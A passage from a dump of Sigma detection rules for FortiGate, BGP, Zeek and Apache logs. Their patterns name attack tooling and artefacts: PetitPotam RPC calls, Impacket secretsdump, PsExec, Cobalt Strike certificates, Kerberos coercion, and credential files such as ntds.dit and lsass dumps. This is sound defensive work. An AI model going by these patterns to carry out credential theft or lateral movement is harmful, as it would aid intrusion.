action: 'Add'
cfgpath: 'vpn.ssl.web.portal'
condition: selection
falsepositives:
- A VPN SSL Web Portal can be added for legitimate purposes.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml
================================================
title: FortiGate - User Group Modified
id: 69ffc84e-8b1a-4024-8351-e018f66b8275
status: experimental
description: |
Detects the modification of a user group on a Fortinet FortiGate Firewall.
The group could be used to grant VPN access to a network.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.persistence
- attack.privilege-escalation
# - attack.t1098.007
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Edit'
cfgpath: 'user.group'
condition: selection
falsepositives:
- A group can be modified for legitimate purposes.
level: medium
================================================
FILE: rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml
================================================
title: FortiGate - VPN SSL Settings Modified
id: 8b5dacf2-aeb7-459d-b133-678eb696d410
status: experimental
description: |
Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).
This behavior was observed in pair with the addition of a VPN SSL Web Portal.
references:
- https://www.fortiguard.com/psirt/FG-IR-24-535
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event
- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings
- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr
author: Marco Pedrinazzi @pedrinazziM (InTheCyber)
date: 2025-11-01
tags:
- attack.persistence
- attack.initial-access
- attack.t1133
logsource:
product: fortigate
service: event
detection:
selection:
action: 'Edit'
cfgpath: 'vpn.ssl.settings'
condition: selection
falsepositives:
- VPN SSL settings can be changed for legitimate purposes.
level: medium
================================================
FILE: rules/network/huawei/bgp/huawei_bgp_auth_failed.yml
================================================
title: Huawei BGP Authentication Failures
id: a557ffe6-ac54-43d2-ae69-158027082350
status: test
description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
references:
- https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
author: Tim Brown
date: 2023-01-09
modified: 2023-01-23
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.defense-evasion
- attack.credential-access
- attack.collection
- attack.t1078
- attack.t1110
- attack.t1557
logsource:
product: huawei
service: bgp
definition: 'Requirements: huawei bgp logs need to be enabled and ingested'
detection:
keywords_bgp_huawei:
'|all':
- ':179' # Protocol
- 'BGP_AUTH_FAILED'
condition: keywords_bgp_huawei
falsepositives:
- Unlikely. Except due to misconfigurations
level: low
================================================
FILE: rules/network/juniper/bgp/juniper_bgp_missing_md5.yml
================================================
title: Juniper BGP Missing MD5
id: a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43
status: test
description: Detects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
references:
- https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
author: Tim Brown
date: 2023-01-09
modified: 2023-01-23
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.defense-evasion
- attack.credential-access
- attack.collection
- attack.t1078
- attack.t1110
- attack.t1557
logsource:
product: juniper
service: bgp
definition: 'Requirements: juniper bgp logs need to be enabled and ingested'
detection:
keywords_bgp_juniper:
'|all':
- ':179' # Protocol
- 'missing MD5 digest'
condition: keywords_bgp_juniper
falsepositives:
- Unlikely. Except due to misconfigurations
level: low
================================================
FILE: rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml
================================================
title: MITRE BZAR Indicators for Execution
id: b640c0b8-87f8-4daa-aef8-95a24261dd1d
status: test
description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE'
references:
- https://github.com/mitre-attack/bzar#indicators-for-attck-execution
author: '@neu5ron, SOC Prime'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1047
- attack.t1053.002
- attack.t1569.002
logsource:
product: zeek
service: dce_rpc
detection:
op1:
endpoint: 'JobAdd'
operation: 'atsvc'
op2:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcEnableTask'
op3:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcRegisterTask'
op4:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcRun'
op5:
endpoint: 'IWbemServices'
operation: 'ExecMethod'
op6:
endpoint: 'IWbemServices'
operation: 'ExecMethodAsync'
op7:
endpoint: 'svcctl'
operation: 'CreateServiceA'
op8:
endpoint: 'svcctl'
operation: 'CreateServiceW'
op9:
endpoint: 'svcctl'
operation: 'StartServiceA'
op10:
endpoint: 'svcctl'
operation: 'StartServiceW'
condition: 1 of op*
falsepositives:
- Windows administrator tasks or troubleshooting
- Windows management scripts or software
level: medium
================================================
FILE: rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml
================================================
title: MITRE BZAR Indicators for Persistence
id: 53389db6-ba46-48e3-a94c-e0f2cefe1583
status: test
description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'
references:
- https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
author: '@neu5ron, SOC Prime'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.004
logsource:
product: zeek
service: dce_rpc
detection:
op1:
endpoint: 'spoolss'
operation: 'RpcAddMonitor'
op2:
endpoint: 'spoolss'
operation: 'RpcAddPrintProcessor'
op3:
endpoint: 'IRemoteWinspool'
operation: 'RpcAsyncAddMonitor'
op4:
endpoint: 'IRemoteWinspool'
operation: 'RpcAsyncAddPrintProcessor'
op5:
endpoint: 'ISecLogon'
operation: 'SeclCreateProcessWithLogonW'
op6:
endpoint: 'ISecLogon'
operation: 'SeclCreateProcessWithLogonExW'
condition: 1 of op*
falsepositives:
- Windows administrator tasks or troubleshooting
- Windows management scripts or software
level: medium
================================================
FILE: rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
================================================
title: Potential PetitPotam Attack Via EFS RPC Calls
id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a
status: test
description: |
Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.
The usage of this RPC function should be rare if ever used at all.
Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.
View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
references:
- https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003
- https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf
- https://threatpost.com/microsoft-petitpotam-poc/168163/
author: '@neu5ron, @Antonlovesdnb, Mike Remen'
date: 2021-08-17
modified: 2022-11-28
tags:
- attack.collection
- attack.credential-access
- attack.t1557.001
- attack.t1187
logsource:
product: zeek
service: dce_rpc
detection:
selection:
operation|startswith: 'efs'
condition: selection
falsepositives:
- Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).
level: medium
================================================
FILE: rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
================================================
title: SMB Spoolss Name Piped Usage
id: bae2865c-5565-470d-b505-9496c87d0c30
status: test
description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
references:
- https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
- https://dirkjanm.io/a-different-way-of-abusing-zerologon/
- https://twitter.com/_dirkjan/status/1309214379003588608
author: OTR (Open Threat Research), @neu5ron
date: 2018-11-28
modified: 2022-10-09
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path|endswith: 'IPC$'
name: spoolss
condition: selection
falsepositives:
- Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too
level: medium
================================================
FILE: rules/network/zeek/zeek_default_cobalt_strike_certificate.yml
================================================
title: Default Cobalt Strike Certificate
id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118
status: test
description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic
references:
- https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
author: Bhabesh Raj
date: 2021-06-23
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.s0154
logsource:
product: zeek
service: x509
detection:
selection:
certificate.serial: 8BB00EE
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml
================================================
title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing - Network
id: 5588576c-5898-4fac-bcdd-7475a60e8f43
related:
- id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing
type: similar
- id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing
type: similar
status: experimental
description: |
Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.
references:
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
- attack.collection
- attack.credential-access
- attack.persistence
- attack.privilege-escalation
- attack.t1557.001
- attack.t1187
logsource:
product: zeek
service: dns
detection:
selection:
query|contains|all:
- 'UWhRCA' # Follows this pattern UWhRCAAAAA..BAAA
- 'BAAAA'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/zeek/zeek_dns_mining_pools.yml
================================================
title: DNS Events Related To Mining Pools
id: bf74135c-18e8-4a72-a926-0e4f47888c19
status: test
description: Identifies clients that may be performing DNS lookups associated with common currency mining pools.
references:
- https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml
author: Saw Winn Naung, Azure-Sentinel, @neu5ron
date: 2021-08-19
modified: 2022-07-07
tags:
- attack.execution
- attack.t1569.002
- attack.impact
- attack.t1496
logsource:
service: dns
product: zeek
detection:
selection:
query|endswith:
- 'monerohash.com'
- 'do-dear.com'
- 'xmrminerpro.com'
- 'secumine.net'
- 'xmrpool.com'
- 'minexmr.org'
- 'hashanywhere.com'
- 'xmrget.com'
- 'mininglottery.eu'
- 'minergate.com'
- 'moriaxmr.com'
- 'multipooler.com'
- 'moneropools.com'
- 'xmrpool.eu'
- 'coolmining.club'
- 'supportxmr.com'
- 'minexmr.com'
- 'hashvault.pro'
- 'xmrpool.net'
- 'crypto-pool.fr'
- 'xmr.pt'
- 'miner.rocks'
- 'walpool.com'
- 'herominers.com'
- 'gntl.co.uk'
- 'semipool.com'
- 'coinfoundry.org'
- 'cryptoknight.cc'
- 'fairhash.org'
- 'baikalmine.com'
- 'tubepool.xyz'
- 'fairpool.xyz'
- 'asiapool.io'
- 'coinpoolit.webhop.me'
- 'nanopool.org'
- 'moneropool.com'
- 'miner.center'
- 'prohash.net'
- 'poolto.be'
- 'cryptoescrow.eu'
- 'monerominers.net'
- 'cryptonotepool.org'
- 'extrmepool.org'
- 'webcoin.me'
- 'kippo.eu'
- 'hashinvest.ws'
- 'monero.farm'
- 'linux-repository-updates.com'
- '1gh.com'
- 'dwarfpool.com'
- 'hash-to-coins.com'
- 'pool-proxy.com'
- 'hashfor.cash'
- 'fairpool.cloud'
- 'litecoinpool.org'
- 'mineshaft.ml'
- 'abcxyz.stream'
- 'moneropool.ru'
- 'cryptonotepool.org.uk'
- 'extremepool.org'
- 'extremehash.com'
- 'hashinvest.net'
- 'unipool.pro'
- 'crypto-pools.org'
- 'monero.net'
- 'backup-pool.com'
- 'mooo.com' # Dynamic DNS, may want to exclude
- 'freeyy.me'
- 'cryptonight.net'
- 'shscrypto.net'
exclude_answers:
answers:
- '127.0.0.1'
- '0.0.0.0'
exclude_rejected:
rejected: 'true'
condition: selection and not 1 of exclude_*
falsepositives:
- A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'.
level: low
================================================
FILE: rules/network/zeek/zeek_dns_nkn.yml
================================================
title: New Kind of Network (NKN) Detection
id: fa7703d6-0ee8-4949-889c-48c84bc15b6f
status: test
description: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>
references:
- https://github.com/nknorg/nkn-sdk-go
- https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/
- https://github.com/Maka8ka/NGLite
author: Michael Portera (@mportatoes)
date: 2022-04-21
tags:
- attack.command-and-control
logsource:
product: zeek
service: dns
detection:
selection:
query|contains|all:
- 'seed'
- '.nkn.org'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/network/zeek/zeek_dns_susp_zbit_flag.yml
================================================
title: Suspicious DNS Z Flag Bit Set
id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5
status: test
description: |
The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).
Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.
Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.
Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.
This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
references:
- https://twitter.com/neu5ron/status/1346245602502443009
- https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma
- https://tools.ietf.org/html/rfc2929#section-2.1
- https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS
author: '@neu5ron, SOC Prime Team, Corelight'
date: 2021-05-04
modified: 2022-11-29
tags:
- attack.t1095
- attack.t1571
- attack.command-and-control
logsource:
product: zeek
service: dns
detection:
z_flag_unset:
Z: 0
most_probable_valid_domain:
query|contains: '.'
exclude_tlds:
query|endswith:
- '.arpa'
- '.local'
- '.ultradns.net'
- '.twtrdns.net'
- '.azuredns-prd.info'
- '.azure-dns.com'
- '.azuredns-ff.info'
- '.azuredns-ff.org'
- '.azuregov-dns.org'
exclude_query_types:
qtype_name:
- 'ns'
- 'mx'
exclude_responses:
answers|endswith: '\\x00'
exclude_netbios:
id.resp_p:
- 137
- 138
- 139
condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios)
falsepositives:
- 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.'
- 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"'
level: medium
================================================
FILE: rules/network/zeek/zeek_dns_torproxy.yml
================================================
title: DNS TOR Proxies
id: a8322756-015c-42e7-afb1-436e85ed3ff5
related:
- id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544
type: similar
- id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2
type: similar
status: test
description: Identifies IPs performing DNS lookups associated with common Tor proxies.
references:
- https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml
author: Saw Winn Naung , Azure-Sentinel
date: 2021-08-15
modified: 2025-09-12
tags:
- attack.exfiltration
- attack.t1048
logsource:
service: dns
product: zeek
detection:
selection:
query|endswith:
- '.hiddenservice.net'
- '.onion.ca'
- '.onion.cab'
- '.onion.casa'
- '.onion.city'
- '.onion.direct'
- '.onion.dog'
- '.onion.glass'
- '.onion.gq'
- '.onion.guide'
- '.onion.in.net'
- '.onion.ink'
- '.onion.it'
- '.onion.link'
- '.onion.lt'
- '.onion.lu'
- '.onion.ly'
- '.onion.mn'
- '.onion.network'
- '.onion.nu'
- '.onion.pet'
- '.onion.plus'
- '.onion.pt'
- '.onion.pw'
- '.onion.rip'
- '.onion.sh'
- '.onion.si'
- '.onion.to'
- '.onion.top'
- '.onion.ws'
- '.onion'
- '.s1.tor-gateways.de'
- '.s2.tor-gateways.de'
- '.s3.tor-gateways.de'
- '.s4.tor-gateways.de'
- '.s5.tor-gateways.de'
- '.t2w.pw'
- '.tor2web.ae.org'
- '.tor2web.blutmagie.de'
- '.tor2web.com'
- '.tor2web.fi'
- '.tor2web.io'
- '.tor2web.org'
- '.tor2web.xyz'
- '.torlink.co'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/network/zeek/zeek_http_executable_download_from_webdav.yml
================================================
title: Executable from Webdav
id: aac2fd97-bcba-491b-ad66-a6edf89c71bf
status: test
description: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/'
references:
- http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html
- https://github.com/OTRF/detection-hackathon-apt29
author: 'SOC Prime, Adam Swan'
date: 2020-05-01
modified: 2021-11-27
tags:
- attack.command-and-control
- attack.t1105
logsource:
product: zeek
service: http
detection:
selection_webdav:
- c-useragent|contains: 'WebDAV'
- c-uri|contains: 'webdav'
selection_executable:
- resp_mime_types|contains: 'dosexec'
- c-uri|endswith: '.exe'
condition: selection_webdav and selection_executable
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml
================================================
title: HTTP Request to Low Reputation TLD or Suspicious File Extension
id: 68c2c604-92ad-468b-bf4a-aac49adad08c
status: experimental
description: |
Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.
references:
- https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows
- https://www.spamhaus.org/reputation-statistics/cctlds/domains/
author: '@signalblur, Corelight'
date: 2025-02-26
tags:
- attack.initial-access
- attack.command-and-control
logsource:
product: zeek
service: http
detection:
# Suspicious TLD in the 'host' field OR malicious file extension in the 'uri' field.
selection_suspicious_tld:
host|endswith:
- '.bid'
- '.by'
- '.cf'
- '.click'
- '.cm'
- '.ga'
- '.gq'
- '.ir'
- '.kp'
- '.loan'
- '.ml'
- '.mm'
- '.party'
- '.pw'
- '.ru'
- '.su'
- '.sy'
- '.tk'
- '.top'
- '.tv'
- '.ve'
- '.work'
- '.xyz'
selection_malicious_ext:
uri|endswith:
- '.bat'
- '.bin'
- '.cmd'
- '.cpl'
- '.dll'
- '.dylib'
- '.elf'
- '.exe'
- '.hta'
- '.iso'
- '.jar'
- '.js'
- '.lnk'
- '.msi'
- '.pif'
- '.ps1'
- '.py'
- '.reg'
- '.scr'
- '.sh'
- '.so'
- '.vbs'
- '.wsf'
selection_malicious_mime:
resp_mime_types:
- 'application/vnd.microsoft.portable-executable'
- 'application/x-bat'
- 'application/x-dosexec'
- 'application/x-elf'
- 'application/x-iso9660-image'
- 'application/x-java-archive'
- 'application/x-ms-shortcut'
- 'application/x-msdos-program'
- 'application/x-msdownload'
- 'application/x-python-code'
- 'application/x-sh'
condition: selection_suspicious_tld and 1 of selection_malicious_*
falsepositives:
- Rare legitimate software downloads from low quality TLDs
level: medium
================================================
FILE: rules/network/zeek/zeek_http_webdav_put_request.yml
================================================
title: WebDav Put Request
id: 705072a5-bb6f-4ced-95b6-ecfa6602090b
status: test
description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/17
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2024-03-13
tags:
- attack.exfiltration
- attack.t1048.003
logsource:
product: zeek
service: http
detection:
selection:
user_agent|contains: 'WebDAV'
method: 'PUT'
filter:
id.resp_h|cidr:
- '10.0.0.0/8'
- '127.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
condition: selection and not filter
falsepositives:
- Unknown
level: low
================================================
FILE: rules/network/zeek/zeek_rdp_public_listener.yml
================================================
title: Publicly Accessible RDP Service
id: 1fc0809e-06bf-4de3-ad52-25e5263b7623
status: test
description: |
Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
author: Josh Brower @DefensiveDepth
date: 2020-08-22
modified: 2024-03-13
tags:
- attack.lateral-movement
- attack.t1021.001
logsource:
product: zeek
service: rdp
detection:
selection:
id.orig_h|cidr:
- '::1/128' # IPv6 loopback
- '10.0.0.0/8'
- '127.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '2620:83:8000::/48'
- 'fc00::/7' # IPv6 private addresses
- 'fe80::/10' # IPv6 link-local addresses
# approved_rdp:
# dst_ip:
# - x.x.x.x
condition: not selection # and not approved_rdp
falsepositives:
- Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.
level: high
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml
================================================
title: Remote Task Creation via ATSVC Named Pipe - Zeek
id: dde85b37-40cd-4a94-b00c-0b8794f956b5
related:
- id: f6de6525-4509-495a-8a82-1f8b0ed73a00
type: derived
status: test
description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
references:
- https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
author: 'Samir Bousseaden, @neu5rn'
date: 2020-04-03
modified: 2022-12-27
tags:
- attack.privilege-escalation
- attack.execution
- attack.lateral-movement
- attack.persistence
- car.2013-05-004
- car.2015-04-001
- attack.t1053.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path: '\\\*\IPC$'
name: 'atsvc'
# Accesses: '*WriteData*'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml
================================================
title: Possible Impacket SecretDump Remote Activity - Zeek
id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e
status: test
description: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml'
references:
- https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
author: 'Samir Bousseaden, @neu5ron'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1003.002
- attack.t1003.004
- attack.t1003.003
logsource:
product: zeek
service: smb_files
detection:
selection:
path|contains|all:
- '\'
- 'ADMIN$'
name|contains: 'SYSTEM32\'
name|endswith: '.tmp'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml
================================================
title: First Time Seen Remote Named Pipe - Zeek
id: 021310d9-30a6-480a-84b7-eaa69aeb92bb
related:
- id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
type: derived
status: test
description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
references:
- https://twitter.com/menasec1/status/1104489274387451904
author: Samir Bousseaden, @neu5ron, Tim Shelton
date: 2020-04-02
modified: 2022-12-27
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path: '\\\\\*\\IPC$' # Looking for the string \\*\IPC$
filter_keywords:
- 'samr'
- 'lsarpc'
- 'winreg'
- 'netlogon'
- 'srvsvc'
- 'protected_storage'
- 'wkssvc'
- 'browser'
- 'netdfs'
- 'svcctl'
- 'spoolss'
- 'ntsvcs'
- 'LSM_API_service'
- 'HydraLsPipe'
- 'TermSrv_API_service'
- 'MsFteWds'
condition: selection and not 1 of filter_*
falsepositives:
- Update the excluded named pipe to filter out any newly observed legit named pipe
level: high
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml
================================================
title: Suspicious PsExec Execution - Zeek
id: f1b3a22a-45e6-4004-afb5-4291f9c21166
related:
- id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82
type: derived
status: test
description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
references:
- https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
author: Samir Bousseaden, @neu5ron, Tim Shelton
date: 2020-04-02
modified: 2022-12-27
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path|contains|all:
- '\\'
- '\IPC$'
name|endswith:
- '-stdin'
- '-stdout'
- '-stderr'
filter:
name|startswith: 'PSEXESVC'
condition: selection and not filter
falsepositives:
- Unknown
level: high
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml
================================================
title: Suspicious Access to Sensitive File Extensions - Zeek
id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc
related:
- id: 91c945bc-2ad1-4799-a591-4d00198a1215
type: derived
status: test
description: Detects known sensitive file extensions via Zeek
references:
- Internal Research
author: Samir Bousseaden, @neu5ron
date: 2020-04-02
modified: 2025-10-17
tags:
- attack.collection
logsource:
product: zeek
service: smb_files
detection:
selection:
name|endswith:
- '.pst'
- '.ost'
- '.msg'
- '.nst'
- '.oab'
- '.edb'
- '.nsf'
- '.bak'
- '.dmp'
- '.kirbi'
# - '\groups.xml' # Commented out: groups.xml is accessed legitimately by Group Policy processing; high FP rate in enterprise environments
- '.rdp'
condition: selection
falsepositives:
- Help Desk operator doing backup or re-imaging end user machine or backup software
- Users working with these data types or exchanging message files
level: medium
================================================
FILE: rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml
================================================
title: Transferring Files with Credential Data via Network Shares - Zeek
id: 2e69f167-47b5-4ae7-a390-47764529eff5
related:
- id: 910ab938-668b-401b-b08c-b596e80fdca5
type: similar
status: test
description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: '@neu5ron, Teymur Kheirkhabarov, oscd.community'
date: 2020-04-02
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1003.002
- attack.t1003.001
- attack.t1003.003
logsource:
product: zeek
service: smb_files
detection:
selection:
name:
- '\mimidrv'
- '\lsass'
- '\windows\minidump\'
- '\hiberfil'
- '\sqldmpr'
- '\sam'
- '\ntds.dit'
- '\security'
condition: selection
falsepositives:
- Transferring sensitive files for legitimate administration work by legitimate administrator
level: medium
================================================
FILE: rules/network/zeek/zeek_susp_kerberos_rc4.yml
================================================
title: Kerberos Network Traffic RC4 Ticket Encryption
id: 503fe26e-b5f2-4944-a126-eab405cc06e5
status: test
description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting
references:
- https://adsecurity.org/?p=3458
author: sigma
date: 2020-02-12
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1558.003
logsource:
product: zeek
service: kerberos
detection:
selection:
request_type: 'TGS'
cipher: 'rc4-hmac'
computer_acct:
service|startswith: '$'
condition: selection and not computer_acct
falsepositives:
- Normal enterprise SPN requests activity
level: medium
================================================
FILE: rules/web/product/apache/web_apache_segfault.yml
================================================
title: Apache Segmentation Fault
id: 1da8ce0b-855d-4004-8860-7d64d42063b1
status: test
description: Detects a segmentation fault error message caused by a crashing apache worker process
references:
- http://www.securityfocus.com/infocus/1633
author: Florian Roth (Nextron Systems)
date: 2017-02-28
modified: 2021-11-27
tags:
- attack.impact
- attack.t1499.004
logsource:
service: apache
definition: 'Requirements: Must be able to collect the error.log file'
detection:
keywords:
- 'exit signal Segmentation Fault'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/product/apache/web_apache_threading_error.yml
================================================
title: Apache Threading Error
id: e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c
status: test
description: Detects an issue in apache logs that reports threading related errors
references:
- https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md
author: Florian Roth (Nextron Systems)
date: 2019-01-22
modified: 2021-11-27
tags:
- attack.initial-access
- attack.lateral-movement
- attack.t1190
- attack.t1210
logsource:
service: apache
definition: 'Requirements: Must be able to collect the error.log file'
detection:
keywords:
